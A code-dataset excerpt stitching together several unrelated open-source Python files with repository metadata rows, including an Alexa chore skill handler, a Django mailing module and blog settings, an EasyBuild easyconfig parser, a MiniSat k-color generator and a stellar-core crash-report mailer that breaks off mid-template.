elif lastChore == "MillieNails":
speech_output = speech_output + "Millie's nails were last clipped by "
elif lastChore == "KittyXNails":
speech_output = speech_output + "Kitty X's nails were last clipped by "
speech_output = speech_output + str(lastPerson) + " at "+ str(lastTime) + " on " + str(lastDay) + ". "
if lastStatus == "green":
speech_output = speech_output + "The chore has been done recently, and does not need to be done at this time."
elif lastStatus == "yellow":
speech_output = speech_output + "The chore should be done soon, however can go a little bit longer before needing to be done."
else:
speech_output = speech_output + "The chore needs to be done. Please do the chore as soon as possible."
print("Speech Output: " + speech_output)
return build_response({}, build_speechlet_response(
card_title, speech_output, "", True))
else:
speech_output = "Please make your request again, I did not understand your query. "
return build_response({}, build_speechlet_response(
card_title, speech_output, "Please ask me when a chore was done last or tell me that a chore has been completed. ", False))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
""" Called when the session starts """
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def on_intent(intent_request, session, event):
""" Called when the user specifies an intent for this skill """
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
# Dispatch to your skill's intent handlers
if intent_name == "PerformChore":
return performChore(intent, session, event)
elif intent_name == "GetChore":
return getPerformedChore(intent, session, event)
elif intent_name == "AMAZON.HelpIntent":
return get_welcome_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# add cleanup logic here
# --------------- Main handler ------------------
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
print("Received event: " + json.dumps(event, indent=2))
"""
Uncomment this if statement and populate with your sksill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
# if (event['session']['application']['applicationId'] !=
# "amzn1.echo-sdk-ams.app.[unique-value-here]"):
# raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'], event)
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
| gpl-3.0 | 1,798,919,851,824,090,600 | 37.047945 | 138 | 0.607381 | false | 3.885974 | false | false | false |
argolab/herzog | base/event.py | 1 | 1217 | class Precondition(Exception):
def __init__(self, name, **kwargs) :
self.name = name
self.kwargs = kwargs
def __str__(self):
return 'Precondition(%s)' % self.name
class EventServer :
def __init__(self):
self._pool = {}
self._desc = {}
def register(self, event, desc=''):
self._pool[event] = []
self._desc[event] = desc
def bind(self, event, handle=None):
if event not in self._pool :
raise ValueError('No such event name')
# use for decorator
if not handle :
def binder(handle):
self._pool[event].append(handle)
return handle
return binder
self._pool[event].append(handle)
def trigger(self, event, **kwargs):
if event not in self._pool :
raise ValueError('No such event name')
for e in self._pool[event] :
e(**kwargs)
def off(self, event, handle) :
for i, h in enumerate(self._pool[event]) :
if h is handle :
del self._pool[event][i]
return
def help(self, event) :
return self._desc[event]
| gpl-2.0 | 236,320,206,687,170,600 | 25.456522 | 50 | 0.509449 | false | 4.255245 | false | false | false |
596acres/django-livinglots-mailings | livinglots_mailings/mailers.py | 1 | 8385 | from datetime import datetime, timedelta
from itertools import groupby
import logging
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core.mail.message import EmailMultiAlternatives
from django.template.loader import render_to_string
from .models import DeliveryRecord
class Mailer(object):
def __init__(self, mailing):
self.mailing = mailing
self.last_checked = self.mailing.last_checked
self.time_started = datetime.now()
self.mailing.last_checked = self.time_started
self.mailing.save()
def get_recipients(self):
"""Get the recipients to which this mailing should be sent."""
return ()
def get_already_received(self, receiver_type=None):
"""
Find entities [of a particular type] that already received the mailing.
"""
drs = DeliveryRecord.objects.filter(
sent=True,
mailing=self.mailing,
)
if receiver_type:
drs = drs.filter(receiver_type=receiver_type)
# XXX this is not very efficient
return [r.receiver_object for r in drs if r.receiver_object is not None]
def get_context(self, recipients):
"""
Get the context to be used when constructing the subject and text of
the mailing.
"""
return {
'mailing': self.mailing,
'recipients': recipients,
}
def build_subject(self, recipients, context):
return render_to_string(self.mailing.subject_template_name, context)
def build_message(self, recipients, context):
return render_to_string(self.mailing.text_template_name, context)
def build_html_message(self, recipients, context):
if self.mailing.html_template_name:
return render_to_string(self.mailing.html_template_name, context)
return None
def build_bcc(self, recipients):
"""Get a list of email addresses to BCC."""
return (settings.FACILITATORS.get('global', []))
def add_delivery_records(self, recipients, sent=True):
"""
Add a DeliveryRecord to each recipient.
"""
drs = []
for recipient in recipients:
dr = DeliveryRecord(
sent=sent,
mailing=self.mailing,
receiver_object=recipient
)
dr.save()
drs.append(dr)
return drs
def mail(self, fake=False):
"""Get intended recipients, prepare the message, send it."""
recipients = self.get_recipients()
# Faking it--just add delivery records for recipients and jump out
if fake:
self.add_delivery_records(recipients)
return recipients
duplicate_handling = self.mailing.duplicate_handling
if duplicate_handling in ('merge', 'send first'):
# group by email address to handle duplicates
for email, recipient_group in groupby(recipients, lambda r: r.email):
if duplicate_handling == 'send first':
recipient_group = [recipient_group[0]]
self._prepare_and_send_message(list(recipient_group), email)
else:
# Don't bother grouping--every recipient gets every message
for r in recipients:
self._prepare_and_send_message([r], r.email)
return recipients
def _prepare_and_send_message(self, recipients, email):
"""
Build the subject and text of the message, email it to the given
email address.
"""
context = self.get_context(recipients)
self._send(
self.build_subject(recipients, context),
self.build_message(recipients, context),
email,
bcc=self.build_bcc(recipients),
html_message=self.build_html_message(recipients, context),
)
return self.add_delivery_records(recipients)
def _send(self, subject, message, email_address,
bcc=[settings.FACILITATORS['global']], connection=None,
fail_silently=True, html_message=None):
# Subject cannot contain newlines
subject = subject.replace('\n', '').strip()
logging.debug('sending mail with subject "%s" to %s'
% (subject, email_address))
logging.debug('bcc: %s' % (bcc,))
logging.debug('full text: "%s"' % message)
mail = EmailMultiAlternatives(
u'%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message,
from_email=settings.DEFAULT_FROM_EMAIL,
to=[email_address],
connection=connection,
bcc=bcc,
)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently)
class DaysAfterAddedMailer(Mailer):
def get_recipient_queryset(self, model):
"""
Check for entities added in the time between the last time the mailing
was sent and now, shifting backward in time for the number of days
after an entity is added that we want to send them the mailing.
"""
delta = timedelta(days=self.mailing.days_after_added)
return model.objects.filter(
added__gt=self.last_checked - delta,
added__lte=self.time_started - delta,
email__isnull=False,
).exclude(email='')
def _get_ctype_recipients(self, ctype):
"""Get entities of type ctype that should receive the mailing."""
type_recipients = self.get_recipient_queryset(ctype.model_class())
# only get already received if there are potential recipients
if not type_recipients:
return []
received = self.get_already_received(receiver_type=ctype)
return list(set(type_recipients) - set(received))
def get_recipients(self):
recipient_lists = [self._get_ctype_recipients(ct) for ct in self.mailing.target_types.all()]
return reduce(lambda x,y: x+y, recipient_lists)
def get_context(self, recipients):
context = super(DaysAfterAddedMailer, self).get_context(recipients)
context['has_received_this_mailing'] = self.has_received(
self.mailing,
recipients[0]
)
return context
def has_received(self, mailing, recipient):
other_pks = recipient.__class__.objects.filter(
email=recipient.email
).exclude(pk=recipient.pk).values_list('pk', flat=True)
records = DeliveryRecord.objects.filter(
mailing=mailing,
receiver_object_id__in=other_pks,
receiver_type=ContentType.objects.get_for_model(recipient)
)
return records.count() > 0
class DaysAfterParticipantAddedMailer(DaysAfterAddedMailer):
"""
DaysAfterAddedMailer customized for participants, such as those added
through livinglots_organize.
"""
def get_context(self, recipients):
context = super(DaysAfterParticipantAddedMailer, self).get_context(recipients)
# Add BASE_URL for full-path links back to the site
context['BASE_URL'] = Site.objects.get_current().domain
# Consolidate participant objects (handy when merging mailings)
context['lots'] = self.get_lots(recipients)
# Url for changing what one's organizing/watching
context['edit_url'] = recipients[0].get_edit_url()
return context
def get_lots(self, recipients):
"""
Get lots the recipients will be receiving email for.
Filter the lots to ensure that a group does not have access to the lot.
Getting email about starting organizing on a lot when there's already a
project there is misleading/confusing.
"""
lots = list(set([r.content_object for r in recipients]))
return filter(lambda lot: not lot.steward_projects.exists(), lots)
def get_recipients(self):
"""
Get recipients for this mailing.
We confirm that the recipient has lots to receive the mailing for,
first.
"""
recipients = super(DaysAfterParticipantAddedMailer, self).get_recipients()
return [r for r in recipients if len(self.get_lots([r,])) > 0]
| agpl-3.0 | -2,082,258,457,765,415,200 | 34.987124 | 100 | 0.623494 | false | 4.333333 | false | false | false |
alphagov/notifications-api | migrations/versions/0095_migrate_existing_svc_perms.py | 1 | 1614 | """empty message
Revision ID: 0095_migrate_existing_svc_perms
Revises: 0094_job_stats_update
Create Date: 2017-05-23 18:13:03.532095
"""
# revision identifiers, used by Alembic.
revision = '0095_migrate_existing_svc_perms'
down_revision = '0094_job_stats_update'
from alembic import op
import sqlalchemy as sa
migration_date = '2017-05-26 17:30:00.000000'
def upgrade():
def get_values(permission):
return "SELECT id, '{0}', '{1}' FROM services WHERE "\
"id NOT IN (SELECT service_id FROM service_permissions "\
"WHERE service_id=id AND permission='{0}')".format(permission, migration_date)
def get_values_if_flag(permission, flag):
return "SELECT id, '{0}', '{1}' FROM services WHERE "\
"{2} AND id NOT IN (SELECT service_id FROM service_permissions "\
"WHERE service_id=id AND permission='{0}')".format(permission, migration_date, flag)
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(get_values('sms')))
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(get_values('email')))
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(
get_values_if_flag('letter', 'can_send_letters')))
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(
get_values_if_flag('international_sms', 'can_send_international_sms')))
def downgrade():
op.execute("DELETE FROM service_permissions WHERE created_at = '{}'::timestamp".format(migration_date))
| mit | -231,256,906,441,808,160 | 40.384615 | 117 | 0.685874 | false | 3.635135 | false | false | false |
ntamas/python-selecta | selecta/matches.py | 1 | 2701 | from functools import total_ordering
@total_ordering
class Match(object):
"""Object representing a match in a search index.
Attributes:
matched_object (object): the object that was matched
matched_string (string): the string representation of the object
score (float): the score of the match. Higher scores indicate a better
match.
substrings (list of tuples): optional list of substrings to mark in
the string representation of the object. Each tuple in the list
is a pair of the start and end indices of the substring.
"""
def __init__(self):
self.matched_object = None
self.matched_string = None
self.score = 0.0
self.substrings = []
def __lt__(self, other):
return self.score < other.score or \
self.matched_string < other.matched_string
def canonicalize(self):
"""Canonicalizes the match by ensuring that the ranges in the map
do not overlap with each other and are sorted by the start index."""
self.substrings = canonical_ranges(self.substrings)
def canonical_ranges(ranges):
"""Given a list of ranges of the form ``(start, end)``, returns
another list that ensures that:
- For any number *x*, *x* will be included in at most one of the returned
ranges.
- For any number *x*, *x* will be included in one of the returned ranges
if and only if *x* was included in at least one of the input ranges.
- The returned ranges are sorted by the start index.
- There exist no pairs of ranges in the returned list such that the end
of one of the ranges is the start of the other.
Args:
ranges (list of tuples): list of ranges of the form ``(start, end)``
Returns:
list of tuples: the canonical representation of the input list, as
defined by the rules above.
"""
if len(ranges) < 2:
return ranges
result = sorted(ranges)
changed = True
while changed:
if len(result) < 2:
return result
next_result, changed = [], False
prev_start, prev_end = result.pop(0)
for curr in result:
curr_start, curr_end = curr
if prev_end >= curr_start:
# prev and curr have an overlap, so merge them
prev_end = curr_end
changed = True
else:
# No overlap, prev_start and prev_end can be saved
next_result.append((prev_start, prev_end))
prev_start, prev_end = curr
next_result.append((prev_start, prev_end))
result = next_result
return result
| mit | 9,098,674,901,230,635,000 | 32.7625 | 78 | 0.613847 | false | 4.43514 | false | false | false |
romanvm/romans_blog | romans_blog/settings/base.py | 1 | 8236 | # coding: utf-8
"""
Django settings for romans_blog project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
)
sys.path.insert(0, BASE_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fvh+o&w4qo-afc#fu8fy7=1_imte!d7k1d)9q+=603@963+sk!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'localhost']
SITE_ID = 1
# Application definition
INSTALLED_APPS = [
'filebrowser',
'tinymce',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.sitemaps',
'adminsortable2',
'haystack',
'solo',
'common_content',
'blog',
'pages',
'bootstrap4_skin',
]
MIDDLEWARE = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'common_content.middleware.maintenance_mode_middleware',
]
ROOT_URLCONF = 'romans_blog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'romans_blog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGES = [
('en-us', 'US English'),
('ru', 'Русский'),
('uk', 'Українська'),
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Kiev'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Media files (user images, videos, other files)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
FILEBROWSER_ADMIN_THUMBNAIL = 'small'
# TinyMCE settings
common_content_base_url = STATIC_URL + 'common_content/'
TINYMCE_DEFAULT_CONFIG = {
'theme': 'modern',
'plugins': 'advlist autolink link image imagetools lists charmap print hr anchor pagebreak '
'searchreplace wordcount visualblocks visualchars code fullscreen insertdatetime media '
'nonbreaking save table contextmenu directionality emoticons template paste textcolor '
'spellchecker autosave noneditable',
'toolbar1': 'django_saveandcontinue | undo redo | cut copy paste | searchreplace | styleselect removeformat | '
'fontsizeselect | forecolor backcolor | code preview | spellchecker | fullscreen',
'toolbar2': 'bold italic underline strikethrough | alignleft aligncenter alignright alignjustify '
'| bullist numlist outdent indent | blockquote hr charmap nonbreaking '
'| link anchor | image media emoticons | table | codesample | spoiler-add spoiler-remove',
'contextmenu': 'formats | cut copy paste | link image | inserttable row cell',
'style_formats': [
{'title': 'Special', 'items': [
{'title': 'Small text', 'inline': 'small'},
{'title': 'Keyboard input', 'inline': 'kbd'},
{'title': 'Sample output', 'inline': 'samp'},
]},
{'title': 'Image', 'items': [
{'title': 'Image Left', 'selector': 'img', 'styles': {'float': 'left', 'margin': '10px'}},
{'title': 'Image Right', 'selector': 'img', 'styles': {'float': 'right', 'margin': '10px'}}
]},
],
'style_formats_merge': True,
'width': 1024,
'height': 600,
'spellchecker_languages': 'English (US)=en_US,Russian=ru,Ukrainian=uk',
'spellchecker_language': 'en_US',
'plugin_preview_width': 1024,
'plugin_preview_height': 600,
'image_advtab': True,
'default_link_target': '_blank',
'extended_valid_elements': 'span[class]',
'spoiler_caption': '<span class="fa fa-plus-square"></span> Click to show',
'pagebreak_separator': '<!-- ***Blog Cut*** -->',
'external_plugins': {
'spoiler': '../../../common_content/js/spoiler/plugin.min.js',
'django_saveandcontinue': '../../../common_content/js/django_saveandcontinue/plugin.min.js',
'codesample': '../../../common_content/js/codesample/plugin.min.js',
'preview': '../../../common_content/js/preview/plugin.min.js'
},
'codesample_languages': [
{'text': 'Python', 'value': 'python'},
{'text': 'HTML/XML', 'value': 'markup'},
{'text': 'Django/Jinja2', 'value': 'django'},
{'text': 'CSS', 'value': 'css'},
{'text': 'JavaScript', 'value': 'javascript'},
{'text': 'C++', 'value': 'cpp'},
{'text': 'C', 'value': 'c'},
{'text': 'C#', 'value': 'csharp'},
{'text': 'Windows BAT', 'value': 'batch'},
{'text': 'Bash', 'value': 'bash'},
{'text': 'YAML', 'value': 'yaml'},
{'text': 'SQL', 'value': 'sql'},
{'text': 'reStructuredText', 'value': 'rest'},
{'text': 'Plain Text', 'value': 'none'},
],
'content_css': [common_content_base_url + 'css/prism.css'],
}
TINYMCE_SPELLCHECKER = True
TINYMCE_ADDITIONAL_JS_URLS = [
common_content_base_url + 'js/prism.min.js',
common_content_base_url + 'js/prism-django.min.js'
]
# Skin-specific settings
CURRENT_SKIN = 'bootstrap4_skin'
BLOG_POSTS_PAGINATE_BY = 5
TINYMCE_DEFAULT_CONFIG['image_class_list'] = [
{'title': 'Responsive', 'value': 'img-fluid'},
{'title': 'Rounded', 'value': 'img-fluid rounded'},
{'title': 'Thumbnail', 'value': 'img-fluid img-thumbnail'},
]
TINYMCE_DEFAULT_CONFIG['table_class_list'] = [
{'title': 'Simple', 'value': 'table'},
{'title': 'Bordered', 'value': 'table table-bordered'},
{'title': 'Striped', 'value': 'table table-striped'},
{'title': 'Small', 'value': 'table table-sm'},
]
TINYMCE_DEFAULT_CONFIG['table_row_class_list'] = [
{'title': 'None', 'value': ''},
{'title': 'Green', 'value': 'table-success'},
{'title': 'Red', 'value': 'table-danger'},
{'title': 'Blue', 'value': 'table-primary'},
]
TINYMCE_DEFAULT_CONFIG['content_css'] += [
STATIC_URL + 'bootstrap4_skin/css/bootstrap.min.css',
STATIC_URL + 'bootstrap4_skin/css/font-awesome-all.min.css',
STATIC_URL + 'bootstrap4_skin/css/styles.css',
]
DEFAULT_LOGO = STATIC_URL + 'bootstrap4_skin/img/favicon.png'
DEFAULT_FEATURED_IMAGE = STATIC_URL + 'bootstrap4_skin/img/featured/home.jpg'
# Haystack search settings
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(BASE_DIR, 'whoosh_index'),
},
}
# Enable this if your server has enough power to update index on every save
# HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
| gpl-3.0 | 5,356,922,818,080,607,000 | 32.546939 | 115 | 0.633654 | false | 3.316788 | false | false | false |
ULHPC/easybuild-framework | easybuild/framework/easyconfig/parser.py | 3 | 9516 | # #
# Copyright 2013-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
# #
"""
This describes the easyconfig parser
The parser is format version aware
:author: Stijn De Weirdt (Ghent University)
"""
import os
import re
from vsc.utils import fancylogger
from easybuild.framework.easyconfig.format.format import FORMAT_DEFAULT_VERSION
from easybuild.framework.easyconfig.format.format import get_format_version, get_format_version_classes
from easybuild.framework.easyconfig.format.yeb import FormatYeb, is_yeb_format
from easybuild.framework.easyconfig.types import PARAMETER_TYPES, check_type_of_param_value
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import read_file, write_file
# deprecated easyconfig parameters, and their replacements
DEPRECATED_PARAMETERS = {
# <old_param>: (<new_param>, <deprecation_version>),
}
# replaced easyconfig parameters, and their replacements
REPLACED_PARAMETERS = {
'license': 'license_file',
'makeopts': 'buildopts',
'premakeopts': 'prebuildopts',
}
_log = fancylogger.getLogger('easyconfig.parser', fname=False)
def fetch_parameters_from_easyconfig(rawtxt, params):
"""
Fetch (initial) parameter definition from the given easyconfig file contents.
:param rawtxt: contents of the easyconfig file
:param params: list of parameter names to fetch values for
"""
param_values = []
for param in params:
regex = re.compile(r"^\s*%s\s*(=|: )\s*(?P<param>\S.*?)\s*$" % param, re.M)
res = regex.search(rawtxt)
if res:
param_values.append(res.group('param').strip("'\""))
else:
param_values.append(None)
_log.debug("Obtained parameters value for %s: %s" % (params, param_values))
return param_values
class EasyConfigParser(object):
"""Read the easyconfig file, return a parsed config object
Can contain references to multiple version and toolchain/toolchain versions
"""
def __init__(self, filename=None, format_version=None, rawcontent=None,
auto_convert_value_types=True):
"""
Initialise the EasyConfigParser class
:param filename: path to easyconfig file to parse (superseded by rawcontent, if specified)
:param format_version: version of easyconfig file format, used to determine how to parse supplied easyconfig
:param rawcontent: raw content of easyconfig file to parse (preferred over easyconfig file supplied via filename)
:param auto_convert_value_types: indicates whether types of easyconfig values should be automatically converted
in case they are wrong
"""
self.log = fancylogger.getLogger(self.__class__.__name__, fname=False)
self.rawcontent = None # the actual unparsed content
self.auto_convert = auto_convert_value_types
self.get_fn = None # read method and args
self.set_fn = None # write method and args
self.format_version = format_version
self._formatter = None
if rawcontent is not None:
self.rawcontent = rawcontent
self._set_formatter(filename)
elif filename is not None:
self._check_filename(filename)
self.process()
else:
raise EasyBuildError("Neither filename nor rawcontent provided to EasyConfigParser")
self._formatter.extract_comments(self.rawcontent)
def process(self, filename=None):
"""Create an instance"""
self._read(filename=filename)
self._set_formatter(filename)
def check_values_types(self, cfg):
"""
Check types of easyconfig parameter values.
:param cfg: dictionary with easyconfig parameter values (result of get_config_dict())
"""
wrong_type_msgs = []
for key in cfg:
type_ok, newval = check_type_of_param_value(key, cfg[key], self.auto_convert)
if not type_ok:
wrong_type_msgs.append("value for '%s' should be of type '%s'" % (key, PARAMETER_TYPES[key].__name__))
elif newval != cfg[key]:
self.log.warning("Value for '%s' easyconfig parameter was converted from %s (type: %s) to %s (type: %s)",
key, cfg[key], type(cfg[key]), newval, type(newval))
cfg[key] = newval
if wrong_type_msgs:
raise EasyBuildError("Type checking of easyconfig parameter values failed: %s", ', '.join(wrong_type_msgs))
else:
self.log.info("Type checking of easyconfig parameter values passed!")
def _check_filename(self, fn):
"""Perform sanity check on the filename, and set mechanism to set the content of the file"""
if os.path.isfile(fn):
self.get_fn = (read_file, (fn,))
self.set_fn = (write_file, (fn, self.rawcontent))
self.log.debug("Process filename %s with get function %s, set function %s" % (fn, self.get_fn, self.set_fn))
if self.get_fn is None:
raise EasyBuildError('Failed to determine get function for filename %s', fn)
if self.set_fn is None:
raise EasyBuildError('Failed to determine set function for filename %s', fn)
def _read(self, filename=None):
"""Read the easyconfig, dump content in self.rawcontent"""
if filename is not None:
self._check_filename(filename)
try:
self.rawcontent = self.get_fn[0](*self.get_fn[1])
except IOError, err:
raise EasyBuildError('Failed to obtain content with %s: %s', self.get_fn, err)
if not isinstance(self.rawcontent, basestring):
msg = 'rawcontent is not basestring: type %s, content %s' % (type(self.rawcontent), self.rawcontent)
raise EasyBuildError("Unexpected result for raw content: %s", msg)
def _det_format_version(self):
"""Extract the format version from the raw content"""
if self.format_version is None:
self.format_version = get_format_version(self.rawcontent)
if self.format_version is None:
self.format_version = FORMAT_DEFAULT_VERSION
self.log.debug('No version found, using default %s' % self.format_version)
def _get_format_version_class(self):
"""Locate the class matching the version"""
if self.format_version is None:
self._det_format_version()
found_classes = get_format_version_classes(version=self.format_version)
if len(found_classes) == 1:
return found_classes[0]
elif not found_classes:
raise EasyBuildError('No format classes found matching version %s', self.format_version)
else:
raise EasyBuildError("More than one format class found matching version %s in %s",
self.format_version, found_classes)
def _set_formatter(self, filename):
"""Obtain instance of the formatter"""
if self._formatter is None:
if is_yeb_format(filename, self.rawcontent):
self._formatter = FormatYeb()
else:
klass = self._get_format_version_class()
self._formatter = klass()
self._formatter.parse(self.rawcontent)
def set_format_text(self):
"""Create the text for the formatter instance"""
# TODO create the data in self.rawcontent
raise NotImplementedError
def write(self, filename=None):
"""Write the easyconfig format instance, using content in self.rawcontent."""
if filename is not None:
self._check_filename(filename)
try:
self.set_fn[0](*self.set_fn[1])
except IOError, err:
raise EasyBuildError("Failed to process content with %s: %s", self.set_fn, err)
def set_specifications(self, specs):
"""Set specifications."""
self._formatter.set_specifications(specs)
def get_config_dict(self, validate=True):
"""Return parsed easyconfig as a dict."""
# allows to bypass the validation step, typically for testing
if validate:
self._formatter.validate()
cfg = self._formatter.get_config_dict()
self.check_values_types(cfg)
return cfg
def dump(self, ecfg, default_values, templ_const, templ_val):
"""Dump easyconfig in format it was parsed from."""
return self._formatter.dump(ecfg, default_values, templ_const, templ_val)
| gpl-2.0 | 3,530,974,173,393,378,000 | 40.373913 | 121 | 0.650378 | false | 4.025381 | true | false | false |
philoliver/minisat-problem-generators | k_color.py | 1 | 1281 | #!/usr/bin/env python
import argparse
from k_color_minisat_problem import KColorProblem
def make_args_parser():
parser = argparse.ArgumentParser( description='Generates or interpretes the k-color problem for the MiniSat solver', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--file', required=True, type=str, help='The path to a text file. Either output for the problem or input of the solution')
parser.add_argument('--action', required=True, type=str, help='Either "generate" or "interprete"')
return parser.parse_args()
def write_file(file, content):
text_file = open(file, "w")
text_file.write(content)
text_file.close()
def read_file(file):
text_file = open(file, "r")
content = text_file.read()
text_file.close()
return content
def run():
args = make_args_parser()
if args.action not in ["generate", "interpret"]:
raise Exception("Action has to be either 'generate' or 'interpret'.")
else:
problem = KColorProblem()
if args.action == "generate":
write_file(args.file, problem.generate_minisat_problem())
else:
solution = read_file(args.file)
print (problem.interprete_minisat_problem(solution))
if __name__ == "__main__":
run()
| gpl-2.0 | -2,309,434,677,390,948,400 | 27.488889 | 174 | 0.679938 | false | 3.670487 | false | false | false |
stellar/docker-stellar-core | utils/core_file_processor.py | 2 | 6559 | #!/usr/bin/env python
import logging
import sys
import ConfigParser
import os
import socket
import time
import subprocess
from string import Template
import textwrap
import boto.ses
def format_time(epoch_time):
time_format = "%Y-%m-%dT%H:%M:%S"
return time.strftime(time_format, time.gmtime(epoch_time))
class CoreMailer(object):
def __init__(self, config):
self.config = config
self.hostname = self.config.get('Config', 'hostname')
self.out = sys.stdout
def find_core(self):
path = self.config.get('Config', 'cores')
core_filter = self.config.get('Config', 'core_filter')
cores = [os.path.join(path, core) for core in os.listdir(path) if core_filter in core]
if len(cores):
return max(cores, key=os.path.getctime)
def filter_logs(self, logs):
log_filter = self.config.get('Config', 'log_filter')
if not log_filter:
return logs
def strip_prefix(line):
first_space = line.index(' ')
following_colon = line.index(':', first_space)
return line[0:first_space] + line[following_colon:]
lines = logs.split("\n")
filtered = filter(lambda line: log_filter in line, lines)
stripped = map(strip_prefix, filtered)
return "\n".join(stripped)
def find_logs(self, epoch_time):
log = self.config.get('Config', 'log')
formatted_time = format_time(epoch_time)
logging.info('Searching %s for logs around %s', log, formatted_time)
command = ["egrep",
"-C1000",
("^%s" % formatted_time),
log]
try:
return self.filter_logs(subprocess.check_output(command))
except subprocess.CalledProcessError:
return 'Unable to retrieve logs around %s' % formatted_time
def get_trace(self, core):
binary = self.config.get('Config', 'bin')
logging.info('Processing core file %s with binary %s', core, binary)
# matschaffer: this is really awful
# But lldb just exits with no output and exit code -11 if I try to run
# this script as a container entry point
lldb_command = "lldb-3.6 -f %(binary)s -c %(core)s --batch " + \
"-o 'target create -c \"%(core)s\" \"%(binary)s\"' " + \
"-o 'script import time; time.sleep(1)' " + \
"-o 'thread backtrace all'"
command = ["script", "-c",
(lldb_command % {"core": core, "binary": binary})]
return subprocess.check_output(command, stderr=subprocess.STDOUT)
def send_alert(self, epoch_time, trace, logs):
template_vars = {
"hostname": self.hostname,
"binary": self.config.get('Config', 'bin'),
"formatted_time": format_time(epoch_time),
"trace": trace,
"logs": logs
}
sender = self.config.get('Config', 'from')
recipient = self.config.get('Config', 'to')
subject = 'stellar-core crash on %(hostname)s' % template_vars
template = textwrap.dedent("""
<p>${binary} on ${hostname} crashed at ${formatted_time} with the
following back traces:</p>
<pre><code>
${trace}
</code></pre>
